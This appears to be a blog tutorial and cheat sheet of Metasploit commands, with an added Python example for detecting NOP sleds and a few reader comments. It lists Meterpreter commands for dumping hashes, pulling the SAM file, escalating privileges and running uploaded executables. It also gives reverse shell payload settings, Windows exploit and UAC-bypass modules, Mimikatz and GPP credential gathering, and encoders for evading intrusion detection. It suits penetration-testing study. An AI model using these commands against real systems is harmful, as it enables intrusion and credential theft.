Metasploit is an open source penetration testing framework developed by Rapid7 and used by security professionals worldwide. It has been around since 2004, but it still remains one of the best tools available today.
Metasploit allows you to perform attacks on remote systems without having physical access to them. It also lets you test network devices like firewalls and routers. Users can perform network attacks against their own systems or other networks.
In this article, we’ll show you some of the most useful and powerful commands for Metasploit and teach you what you need to know about using them. We hope these tips help you on your way to becoming a more skilled hacker!
- Meterpreter Cheat Sheet Commands
- List of Latest Metasploit Commands
- Windows VNC payload for Meterpreter
- Linux Reverse Meterpreter payload
- Common Metasploit Modules and Remote Windows Metasploit Modules
- Local Windows Metasploit Modules
- Auxiliary Metasploit Modules
- Metasploit Powershell Modules
- Post Exploit Windows Metasploit Modules
- Common Metasploit Commands That You Need To Know
- Useful Metasploit commands
Passwords are like underwear. Don’t let people see it, change it very often, and you shouldn’t share it with strangers.
Meterpreter Cheat Sheet Commands
Command | Description of CMD |
upload file c:\\windows | Meterpreter uploads file to the Windows target machine |
download c:\\windows\\repair\\sam /tmp | Meterpreter downloads the file from the Windows target machine |
execute -f c:\\windows\\temp\\exploit.exe | Meterpreter runs an .exe on the target – handy for executing uploaded exploits |
execute -f cmd -c | Creates a new channel using the cmd shell |
ps | Meterpreter shows you the current processes that are running |
shell | Meterpreter opens a shell on the target machine or server |
getsystem | Meterpreter attempts privilege escalation on the target |
hashdump | Meterpreter attempts to dump the hashes on the target |
portfwd add -l 3389 -p 3389 -r target | Meterpreter creates a port forward to the target machine |
portfwd delete -l 3389 -p 3389 -r target | Meterpreter deletes the port forward |
List of Latest Metasploit Commands
- Meterpreter Payloads:
- Windows reverse meterpreter payload
Command | Description of CMD |
set payload windows/meterpreter/reverse_tcp | Windows reverse tcp payload |
Windows VNC payload for Meterpreter
Command | Description of CMD |
set payload windows/vncinject/reverse_tcp | Meterpreter Windows VNC Payload |
set ViewOnly false | Turns off view-only mode for the VNC session |
Linux Reverse Meterpreter payload
Command | Description of CMD |
set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Common Metasploit Modules and Remote Windows Metasploit Modules
Command | Description of CMD |
use exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
use exploit/windows/dcerpc/ms06_040_netapi | MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit |
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
Local Windows Metasploit Modules
Command | Description of CMD |
use exploit/windows/local/bypassuac | Bypass UAC on Windows 7 + Set target + arch, x86/64 |
Auxiliary Metasploit Modules
Command | Description of CMD |
use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner |
use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner |
use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
use auxiliary/scanner/mysql/mysql_version | Metasploit MySQL Version Scanner |
use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Metasploit Powershell Modules
Command | Description of CMD |
use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module |
use post/windows/manage/powershell/exec_powershell | Metasploit upload and run powershell script through a session |
use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy |
use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload |
Post Exploit Windows Metasploit Modules
Command | Description of CMD |
run post/windows/gather/win_privs | Metasploit show privileges of the current user |
use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords |
load mimikatz -> wdigest | Metasploit load Mimikatz |
run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to |
Common Metasploit Commands That You Need To Know
Metasploit command for updating Framework:
apt update; apt install metasploit-framework |
The command mentioned above provides the latest version of the Metasploit framework. However, running this command might corrupt or break the copy of your software that is installed on your computer.
Metasploit msfconsole:
When you first run Metasploit, the msfconsole window will open on your screen. If you don’t have any previous knowledge or information related to Metasploit, you can simply type “help” into the command line to view all available commands and information.
In order to save time and not overwhelm you with too much information, we will only be explaining the most essential Metasploit commands in this tutorial. With just a basic understanding of these commands, you should be up and running in Metasploit quickly. As you continue to use Metasploit, you will learn more about the advanced options. Also, most command descriptions should be very clear about what the command exactly does and how to use it. For now we will be looking at the most used basic Metasploit commands in this tutorial like:
- The Basic commands: search, use, back, help, info and exit.
- Exploit commands: set to set variables and show to show the exploit options, targets, payloads, encoders, nops and the advanced and evasion options.
- Exploit execution commands: run and exploit to run exploits against a target.
Useful Metasploit commands
Help command
The help command in msfconsole will return a list of possible commands together with a description. When there is an active exploit selected, the help command can be used to get a list of exploit commands.
Info command
The “use” command lets us select an exploit, and the “info” command lets us retrieve information about the selected exploit, like the name, platform, author, available targets, and more. For example, we’ve used the info command on an exploit named ie_execcommand_uaf.
Search command
This command is used to search for different types of vulnerabilities and exploits from the msfconsole.
Metasploit currently contains over 1,500 different exploits, with new ones being added all the time. With this many exploits, it’s important to know how to use the search function effectively in order to find the one you need.
The search function can be used by simply typing in the command “search” followed by a search term – for example, if you’re looking for an exploit related to Flash player, you would type in “search flash”. Metasploit will then search for the given search term in the module names and descriptions.
Searching exploits with keywords
The search command can be used with a keyword in order to look for a specific author, OSVDB ID or platform. If you need help finding the right keyword, the ‘help search’ command can be used to display a list of available keywords in msfconsole. Here is an example:
msf > help search
This will return a list of keywords that can be used with the search command.
To search for modules with a CVE ID from 2016, use the following command:
msf > search cve:2016
This query will return all exploits with a CVE ID from 2016, as well as an auxiliary module scanner for the very recent Fortinet firewall SSH backdoor.
Show options
The show options command displays all the values required by the selected module and payload, which must be set before it can be used against the target machine.
LHOST
This option is what you set when attacking over a WAN. All you need to do is set LHOST to your static IP address and forward all the other ports.
LPORT
On a LAN, you don’t have to port forward, and you can use any port you want. If you’re attacking over a WAN, you need to forward the port you’re attacking from on your router.
Show Payloads
The show payloads command returns a list of compatible payloads for the selected exploit. For most exploits, Metasploit loads many compatible payloads.
Show Targets
This command will give you a list of operating systems that are vulnerable to the selected exploit. The example output was for the adobe_flash_shader_drawing_fill exploit.
Show advanced
The show advanced command lists all of the advanced options for the selected exploit.
Show encoders
This command is used to return all of the compatible encoders for payloads. These encoders can help evade simple IDS/IPS signatures that look for certain bytes in the payload.
Show nops
This command will return a list of NOP generators. NOP is the abbreviation for No Operation. The generators change the byte pattern of the sled so that it bypasses simple IDS/IPS signatures for common NOP sleds. These NOP generators are named after the CPU architecture they’re configured for.
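The encoder and NOP-generator notes above both rest on byte-pattern signatures. As an added example (not from the original article or the Metasploit project), this Python code shows from the defender's side why a fixed 0x90 rule misses a varied sled while a run-length check over single-byte x86 opcodes still flags it. The sample buffers, the 32-bit opcode set and the thresholds are constructed assumptions.

```python
# Added example: fixed-byte signature vs. run-length detection of NOP sleds.
# Assumption: 32-bit x86, where each opcode below is a one-byte instruction that
# falls through to the next one (in 64-bit mode 0x40-0x4F are REX prefixes).
SLED_BYTES = frozenset(
    [0x90]                                        # nop
    + list(range(0x40, 0x50))                     # inc/dec r32
    + list(range(0x91, 0x98))                     # xchg eax, r32
    + [0x98, 0x99, 0xF5, 0xF8, 0xF9, 0xFC, 0xFD]  # cwde cdq cmc clc stc cld std
)

def naive_signature(data: bytes, min_len: int = 16) -> bool:
    """Fixed-byte rule: alert only on a literal run of 0x90."""
    return b"\x90" * min_len in data

def longest_sled(data: bytes, alphabet=SLED_BYTES):
    """Return (offset, length) of the longest run of bytes drawn from alphabet."""
    best_off, best_len, run_start = 0, 0, None
    for i, b in enumerate(data):
        if b not in alphabet:
            run_start = None
            continue
        if run_start is None:
            run_start = i
        if i - run_start + 1 > best_len:
            best_off, best_len = run_start, i - run_start + 1
    return best_off, best_len

def heuristic_signature(data: bytes, min_len: int = 32) -> bool:
    """Alert on a long run of sled-capable bytes, whatever their mix.
    min_len stays high because 0x40-0x4F are also '@' and 'A'-'O' in ASCII."""
    return longest_sled(data)[1] >= min_len

# Constructed sample buffers (not captured traffic).
PREFIX = b"\x00\x01\x02\x03"
CLASSIC = PREFIX + b"\x90" * 64 + b"\xcc\xcc"
VARIED = PREFIX + bytes([0x41, 0x99, 0x4A, 0xF8, 0x97, 0x43] * 8) + b"\xcc\xcc"
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for name, buf in (("classic", CLASSIC), ("varied", VARIED), ("benign", BENIGN)):
        print(name, naive_signature(buf), heuristic_signature(buf), longest_sled(buf))
```

The run-length rule trades misses for false positives on uppercase-heavy text, so in practice it is paired with a length threshold and protocol context rather than used alone.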
Show evasion
This show evasion command returns a list of available evasion techniques.
Conclusion
I hope this guide will be really helpful for you. Share it with your friends and family to help them solve their problems. If you have any questions, then leave them in the comment section. We are always here to help you if you need any help.
Hey there, just wanted to give you a quick heads up. The text in your article seems to be running off the screen in Chrome. I’m not sure if this is a formatting issue or something to do with web browser compatibility but I figured I’d post to let you know. The style and design look great though! Hope you get the issue resolved soon. Thanks
Thanks for letting us know, we’ll try to fix it soon.
Thanks for sharing. I read many of your blog posts, cool, your blog is very good.